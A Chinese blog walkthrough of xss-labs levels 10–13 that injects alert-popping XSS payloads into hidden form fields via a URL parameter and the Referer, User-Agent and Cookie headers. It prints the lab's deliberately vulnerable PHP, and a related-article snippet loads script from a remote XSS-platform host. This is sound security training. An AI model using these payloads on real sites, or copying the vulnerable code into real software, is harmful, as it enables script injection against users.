xss-labs靶场训练(10-13关)

最新推荐文章于 2024-06-24 15:34:14 发布
最新推荐文章于 2024-06-24 15:34:14 发布
阅读量944 收藏 1
点赞数 1
分类专栏: xss 文章标签: xss 信息安全 安全漏洞 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/106306440
版权

第十关

先用<script>alert(xss)</script>试试
在这里插入图片描述
这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort
把三个参数都传进去试试看:

http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3

在这里插入图片描述
发现t_sort可以传入参数,构造Payload:

t_sort=<script>alert(/xss/)</script>

在这里插入图片描述
尖括号被过滤掉了,尝试一下用onclick弹窗。
Payload:

http://192.168.121.129/xss/level10.php?keyword=well done!&t_sort="type=text οnclick=alert(1)//

因为输入框被隐藏了,得利用type="text"把输入框显示出来,这样才能点击输入框触发弹窗。
在这里插入图片描述
成功弹窗
在这里插入图片描述

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里把t_link、t_history、t_sort三个变量都隐藏了,而且只有t_sort可以接收参数,同时也把t_sort的尖括号过滤掉了。利用onclick时件可以成功绕过。

第十一关

来到先查看一下前端代码,看它又出什么新花样
在这里插入图片描述
这里比上一关多了个变量,而且值还是上一关的URL,初步判断这是个referer,
还是先试一下上一关的方法先
在这里插入图片描述
估计后台直接在传入参数那实体化了。那就在这个新增加的参数那下手吧,利用OWASP ZAP截断代理,把Referer改成payload:

"type=text onclick=alert(1)//

在这里插入图片描述

成功绕过
在这里插入图片描述
后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里用到了一个PHP预定义的超级全局变量$_SERVER,这是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。
$_SERVER['HTTP_REFERER']作用:引导用户代理到当前页的前一页的地址。

第十二关

先查看一下前端代码
在这里插入图片描述
这里把上一关的Referer改成了User-Agent
用OWASP ZAP截断代理,把User-Agent改成payload:"type=text onclick=alert(1)//
在这里插入图片描述
成功绕过
在这里插入图片描述

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里用了HTTP_USER_AGENT来获取用户的相关信息的,包括用户使用的浏览器,操作系统等信息,把这段信息改成payload即可绕过。

第十三关

这关的新变量是t_cook了,看名字有可能是cookie
在这里插入图片描述

用OWASP ZAP截断代理,把cookie改成payload:"type=text onclick=alert(1)//
在这里插入图片描述
没变化
在这里插入图片描述
仔细看一下原来还有个user=,把payload加再user=后面
在这里插入图片描述
成功绕过
在这里插入图片描述

后台关键代码:

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里的$_COOKIE变量用于取回 cookie 的值,$_COOKIE["user"]的作用是取回名为 “user” 的 cookie 的值,因此,在user后面插入payload即可绕过。

总结

这几关都利用了隐藏表单,而且有多个隐藏变量。
绕过思路:

  • 先测试一下哪些变量可以传参数
  • 然后构造payload触发弹窗
  • 如果是onclick或者 onmouseover时件得把隐藏的输入框显示出来
  • 如果变量涉及到http报文的相关信息,可以利用代理软件拦截数据包,然后注入payload
见痴
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
谜团XSS靶场1-10解析
wang649的博客
11-27 1034
谜团XSS靶场1-7解析 谜团靶场 简介 前两天觉得自己之前写的博客实在是不行,讲的东西都太基础了,都是千篇一律的内容,这方面的内容也比较难讲好,很多细节方面的东西我自己都不会,索性直接删去这部分内容重新开篇,直接进入实战(打靶机),这样在写博客的同时也不会因为写一篇基础性的文章时间太长而导致没有时间去练手,好了废话说到这里,开始打靶。 第一 首先进到页面,页面什么输入框都没有,但是图片上告诉我们it’s easy 那我们就按照他图片上的走,既然他说了简单,那就直接在URL中进行xss注入 ?name
WEB渗透学习-XSS-labs靶场
04-20
通过XSS-labs靶场训练,你可以系统地提升对XSS的理解,熟练掌握攻击和防御技巧。这个平台不仅适用于初学者,也是经验丰富的安全专家进行技能磨练的好工具。在实践中不断挑战自己,将理论知识转化为实际操作能力,...
xss-labs靶场
风过江南乱的博客
02-18 363
前言 靶场项目地址:https://github.com/do0dl3/xss-labs 题目 level1 直接传入弹个窗就行了 level1.php?name=<script>alert('xss')</script> level2 需写闭合前面的<input name=keyword value=" level2.php?keyword="><script>alert('xss')</script> level3
Web渗透-XSS漏洞深入及xss-labs靶场实战
最新发布
Varin
06-24 1466
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSSxss-labs-level10
Hugu
02-23 372
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
XSS-labs 实战(练习篇)
qtttgeq的博客
02-18 234
xss Labs通
【网络安全 --- xss-labs靶场(11-20)】详细的xss-labs靶场思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 1734
【网络安全 --- xss-labs靶场(11-20)】详细的xss-labs靶场思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-labs靶场
10-13
本篇文章将对xss-labs靶场的六源码进行详细的分析和总结,并对每一xss攻击payload进行解释。 第一 xss-labs靶场的第一源码没有做任何过滤,直接上xss payload:<script>alert("XSS")。这的目的主要是...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
XSS-Labs靶场提供了源码,这对于学习和研究XSS漏洞至重要。通过查看源码,用户可以了解漏洞是如何产生的,以及开发者在哪些地方没有进行适当的输入验证和编码转义。这对于提升Web应用的安全编程技巧大有裨益。 **...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs第1~13
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 2953
文章目录伪重点第1第2第3第4第5第6第7第8第910第11第1213 伪重点 <script>alert(1);</script> //直接嵌入script <script src=https://xsspt.com/MQzN0Z></script> //从远程嵌入script <input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入scr
xss靶场(1-10)
weixin_62884797的博客
03-09 435
首先,我们要了解什么的xss漏洞, xss,通俗的来讲,就是在HTML页面中,插入一些语句,使得后台能够运行我们插入进去的语句,从而攻击别人 第一,这一最为简单,只是去寻找最简单的交互点。 第一个交互点那当然是URL中了。 首先,我们要如何插入进去这条语句。要知道在h5中,绝大多数都是闭合的,也就是一对尖括号。但我们要是在插入点中输入一个">,这样就会使得程序认为已经闭合,后面的便在执行。 我们这时在插入一个js弹窗,便成功的攻击成功。 第二 第二这里,多出来一个输入框,这
XSSxss-labs-level13
Hugu
02-24 383
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
pikachu靶场第十——XSS(跨站脚本)之xss盲打(附代码审计)
yzasts的博客
03-21 606
和之前的存储型xss不同,这里提交的数据并不会返回到页面中,而是提交到后台,在无法登录后台的情况下,就只能盲打。不过这里为了学习漏洞,我们直接登录后台,用户名:admin,密码:123456。这里有两个输入,一个content,一个name。
xss-labs/level13
m0_71299382的博客
11-29 138
xss-labs/level13
xss靶场1-10
LIU6636LIU的博客
03-15 1056
然而,有个坏人在你的便条里偷偷藏了一个小精灵,这个小精灵会在其他人看到你的便条时,突然飞出来,搞破坏,比如将别人的购物车里的商品都换成了垃圾,或者指向了一家不怎么好的商店,让大家误以为那是特价商品的地方。因为很多时候输入内容是有长度限制的,真正的XSS攻击并不是一段毫无意义的弹窗代码,弹窗是为了验证漏洞的是否存在。4. **自我驱动和持续学习意识的养成:** 网络安全领域是一个不断演进和变化的领域,学习XSS攻击只是开始,更重要的是持续学习和不断跟进新的安全技术和趋势,这培养了我自我驱动的学习意识。
XSS-10注入靶场(小游戏)——第十
qq_39330735的博客
02-04 358
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSS-Labs靶场20全攻略:无限制payload实战
XSS-Labs靶场全通指南 XSS-Labs是一个针对Web安全,特别是跨站脚本攻击(Cross-Site Scripting, XSS)的学习平台,它提供了一系列挑战性的实战练习,帮助学习者理解并掌握防御XSS攻击的方法。这个靶场位于GitHub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值